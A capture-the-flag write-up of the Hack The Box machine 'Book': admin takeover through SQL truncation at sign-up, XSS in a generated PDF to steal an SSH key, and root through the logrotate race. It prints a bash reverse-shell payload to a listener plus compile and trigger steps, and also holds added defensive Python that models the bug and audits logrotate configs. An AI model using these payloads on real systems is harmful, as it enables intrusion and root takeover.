Hack The Box Write-Up : Book

rarpunzel
8 min read · Sep 2, 2020

1. Executive Summary

The given address (10.10.10.176) hosts a website for an online library where anyone can sign up and log in as a user. However, the website has a vulnerability that lets people log in as admin and compromise the website.

In this case there are three suspects for the security breach in the library. These vulnerabilities are unsanitized user input leading to an admin authentication bypass, local file read via XSS in a dynamically generated PDF, and a race condition in the logrotate utility.

2. Description

2.1 Enumeration

In today's class I tried to identify the services running on the machine by using nmap, as usual. (I mean, duh, nmap is like primer in makeup.)

Then I tried to access the URL in the browser, which led to a login page. It also has a sign up feature for users who don't have an account there. Since this girl didn't have any account there, I signed up with a "rarpunzel" account (name: rarpunzel; email: rarpunzel@book.htb; password: rarpunzel) and signed in.

Before we dive further, here is a closer look at the website.

a. home.php

b. books.php

c. collections.php

d. contact.php

From these four main menus I found the admin's email, which is in the contact us menu. I used a magic tool called dirb to search for hidden web objects. And simsalabim! From there the "admin" directory was discovered.

Admin directory… who wouldn't fall for that? Like you found a hope in a hopeless place lmao. With the rarpunzel credentials from earlier, I tried to access http://10.10.10.176/admin/index.html, which sent me to an admin login page. The website asks for an admin login with email and password fields. Since we already have a valid email for the admin, the only thing left is the password.

How can we get the admin password? My silly brain started typing the most common password, "admin", and tried to log in with the email "admin@book.htb", but of course this machine is smarter than me. It gave me "Nope" as a rejection.

SO after taking a few sips of coffee, I decided to re-sign up an admin account with the valid email (name: "admin"; email: "admin@book.htb"; password: "rarpunzel") and logged in again at http://10.10.10.176/admin/index.php

And…………

They still replied with "Nope".

Later on I analyzed the source code of the login and sign up pages with inspect element. If you don't know what inspect element is, just press Ctrl+Shift+I.

2.2 Exploitation

While analyzing the source code, I found a fun fact: there is JavaScript on the email field which sets the expected limit, in this case 20 characters, and it can be beaten by adding an arbitrary extra character.

My Mom always told me to be a good girl and obey the rules, but not now, Mom. I'm going to be a bad girl by inputting 21 characters inside the email field.

evil laugh

By using Burp, I intercepted the GET request and re-signed up with modified credentials (name: "admin"; email: "admin@book.htb******C"; password: "rarpunzel"). PS: the stars represent spaces; if you want to use the same credentials, don't forget to replace the star symbols with spaces.

With the credentials above, I tried to log in at http://10.10.10.176/admin/index.php but kept getting the "Nope" message.

So I went back to sign up, using Burp, as a new account with other credentials as follows (name: "admin5"; email: "admin@book.htb******C"; password: "rarpunzel").

Why admin5? Because admin1, admin2, admin3 and admin4 got kicked out as well lmao.

I tried to log in again as admin5, but at the login on http://10.10.10.176/admin/index.php I did not modify the email into 21 characters.

PS: this step is kinda annoying… so here are some tips. First you need to sign up as admin and admin5 in /index.php, and then you should log in to /admin/index.php using email: "admin@book.htb"; password: "rarpunzel", since both of these accounts use the same email.
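Why the 21-character email gets past the admin login, shown as an added toy model (not code from the page or from the Book machine): it assumes the users table stores email in a VARCHAR(20) column on a non-strict MySQL with a PAD SPACE collation, and puts the vulnerable sign-up next to a hardened one.

```python
"""Toy model of the Book sign-up bug (added here; not code from the page or the machine).
It imitates the MySQL behaviours the attack relies on: a non-strict VARCHAR(20) column truncates
longer values, and a PAD SPACE collation compares 'admin@book.htb      ' equal to 'admin@book.htb'."""

EMAIL_MAX = 20  # the limit the page's client-side JavaScript enforces

class FakeUsersTable:
    def __init__(self):
        self.rows = []  # stand-in for users(name, email VARCHAR(20), password)

    @staticmethod
    def _same(a, b):
        return a.rstrip(" ") == b.rstrip(" ")  # PAD SPACE: trailing spaces ignored

    def exists(self, email):
        return any(self._same(r["email"], email) for r in self.rows)

    def insert(self, name, email, password):
        # Non-strict MySQL cuts the value to the column width instead of raising an error.
        self.rows.append({"name": name, "email": email[:EMAIL_MAX], "password": password})

    def login(self, email, password):
        return [r["name"] for r in self.rows
                if self._same(r["email"], email) and r["password"] == password]

def vulnerable_signup(db, name, email, password):
    # Uniqueness is checked on the raw 21-char input, which differs from the admin row;
    # the INSERT then truncates it to 20 chars, i.e. a duplicate of the admin e-mail.
    if db.exists(email):
        return False
    db.insert(name, email, password)
    return True

def hardened_signup(db, name, email, password):
    # Validate server-side what the browser only pretends to enforce, and check uniqueness
    # on the exact value stored. Also turn on strict SQL mode and add a UNIQUE index.
    email = email.strip().lower()
    if not 0 < len(email) <= EMAIL_MAX or db.exists(email):
        return False
    db.insert(name, email, password)
    return True

def replay(signup):
    """Seed the admin row, sign up with the page's crafted e-mail, log in with the plain one."""
    db = FakeUsersTable()
    db.insert("admin", "admin@book.htb", "unknown-real-admin-password")
    crafted = "admin@book.htb" + " " * 6 + "C"  # 21 characters, as on the page
    accepted = signup(db, "admin5", crafted, "rarpunzel")
    return accepted, db.login("admin@book.htb", "rarpunzel")
```

`replay(vulnerable_signup)` returns `(True, ["admin5"])`: the attacker's row answers for the admin email. `replay(hardened_signup)` returns `(False, [])`.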

As I managed to log in as admin, I have to act like an admin, right? So I took a look at every menu to find any differences. Here is a sneak peek of the admin's menu.

Note: in /admin/collections.php the attacker is able to download a PDF. This PDF contains the list of books uploaded by users.

Is it another insecure upload vulnerability????

So I logged in in another window as rarpunzel to upload something. After countless tries, I figured out that the PDF is generated dynamically: only the latest upload can be downloaded by the admin. Thus as rarpunzel I tried to perform XSS (no, not extra small small, but cross site scripting) by filling the book title and author fields with a script:

Oh, and I copied the script into a blank PDF.

With these three components filled with the script, I went back to admin5 and downloaded the PDF.

And from there I gained information about the user reader on the machine.

As we already know about reader, I performed the same XSS method but with a different script. (Put the script into the book name, author and PDF.)

In the screenshot below the attacker received the private key for "reader".

It should be noted that some strings are cut off in the private key, so it cannot be used. This happens because the text is larger than the PDF container. So the attacker decided to make the text smaller by modifying the script.

Hence the right private key was successfully obtained and ready to use. To use the private key, the attacker converted the PDF to txt using the online converter https://pdftotext.com/.

After gaining the complete version of reader's private key, I logged in as reader using SSH. (PS: don't forget to change the permissions; use chmod 600 so only the owner can read and write the key.)

Inside reader's home there is user.txt, which can be accessed right away. I did not expect there to be a flag right in front of the door actually…

2.3 Privilege Escalation

After gaining the user flag, it is time for us to do privilege escalation. The most fun and exciting activity in today's scenario!!!!

There is a magic tool called LinPEAS (Linux Privilege Escalation Awesome Script) that gives you a huge push to escalate privileges. By using LinPEAS, I got information about writable log files on the machine, flagged as logrotten.

Logrotten is the infamous name for insecure logrotate. Logrotate itself is a system utility that manages the automatic rotation and compression of log files. If log files were not rotated, compressed, and periodically pruned, they could eventually consume all available disk space on a system. Normally, logrotate is run as a daily cron job. It will not modify a log more than once in one day unless the criterion for that log is based on the log's size and logrotate is being run more than once each day.

did you all get it?

According to https://github.com/whotwagner/logrotten, logrotate is insecure because:

  • logrotate is prone to a race condition after renaming the logfile.
  • If logrotate is executed as root, with option that creates a file ( like create, copy, compress, etc.) and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
  • An attacker could elevate his privileges by writing reverse-shells into directories like “/etc/bash_completition.d/”.

Easier explanation here : https://hackerone.com/reports/578119
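A defender-side check for the precondition described above, added here and not part of the write-up or the logrotten project: it parses a constructed logrotate configuration and flags stanzas that root rotates in a directory owned by an unprivileged user, with a file-writing option and without a `su` directive. The `su user group` directive and the option names are real logrotate syntax; the sample log paths are made up.

```python
"""Defender-side check added here (not from the write-up or the logrotten project): find
logrotate stanzas with the precondition logrotten abuses, i.e. root rotates a log whose
parent directory belongs to an unprivileged user, writes a file afterwards, and no
`su user group` directive drops privileges. The configuration below is constructed."""
import os
import re
import stat

SAMPLE_CONFIG = """\
/var/log/syslog {
    daily
    compress
}
/home/reader/backups/access.log {
    daily
    create 0644 reader reader
    compress
}
/var/log/app/app.log {
    su app app
    create
}
"""
# Options after which logrotate creates a file (the list the logrotten README points at).
FILE_WRITING_OPTS = {"create", "copy", "copytruncate", "compress"}

def parse_stanzas(text):
    """Yield (paths, option names) for each `path [path ...] { ... }` block."""
    for m in re.finditer(r"([^{}\n]+)\{([^}]*)\}", text):
        paths = m.group(1).split()
        opts = {line.split()[0] for line in m.group(2).splitlines() if line.strip()}
        yield paths, opts

def dir_owner_and_mode(path):
    """Owner uid and permission bits of the log's parent directory (real filesystem)."""
    st = os.stat(os.path.dirname(path))
    return st.st_uid, stat.S_IMODE(st.st_mode)

def audit(text, dir_info=dir_owner_and_mode):
    """Return log paths whose rotation the directory owner could race.
    `dir_info` is injectable so the check also runs against recorded metadata."""
    risky = []
    for paths, opts in parse_stanzas(text):
        if "su" in opts or not opts & FILE_WRITING_OPTS:
            continue  # privileges dropped, or nothing is written after the rename
        for path in paths:
            uid, mode = dir_info(path)
            if uid != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
                risky.append(path)
    return risky
```

Run against the sample with /home/reader/backups owned by uid 1000, `audit` reports only /home/reader/backups/access.log; the fix on the flagged stanza is a `su reader reader` line or not rotating user-controlled logs as root at all.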

Based on the manual on GitHub, to do the privilege escalation there are two things to prepare.

First, the exploit: logrotten.c

I compiled the code and saved it to a new file named logrotate with the command below.

gcc -o logrotate logrotten.c

Second, let's not forget the payload already given by the good guys on GitHub. I saved it as payloadfile.

if [ `id -u` -eq 0 ]; then (bash -i >& /dev/tcp/10.10.14.2/1234 0>&1 &); fi

Before getting any further, don't forget to make both files executable with the command seen below.

chmod +x logrotate payloadfile

Now that we are set, let's turn on the listener on our machine.

Listener is done; next, the exploit.

After the exploit is running, what we need to do is trigger it. Trigger it by appending some random string to the log file.

So the steps are: run the exploit -> modify the log -> watch the listener. PS: the exploit takes multiple tries before the listener catches a shell.

Don't stop until the listener gives you a shell!

After gaining access to the shell, I figured out that there is limited time to use it. So we have to be extremely fast, or we have to deal with more "triggering the exploit" activity.

Ending: I (finally) got the root flag.

3. Reference
